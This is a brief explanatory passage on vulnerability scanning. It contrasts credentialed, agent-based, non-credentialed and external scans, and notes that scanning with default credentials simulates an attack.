A credentialed scan authenticates to the target with supplied credentials and can inspect installed software, configuration and patch levels that an unauthenticated probe cannot see. An agent-based scan achieves the same depth by running locally on the host under the agent's own privileges, without the scanner holding network credentials at all. Non-credentialed and external scans only see what is exposed over the network, and scanning with default credentials is an attack simulation, not a way to assess authenticated applications.
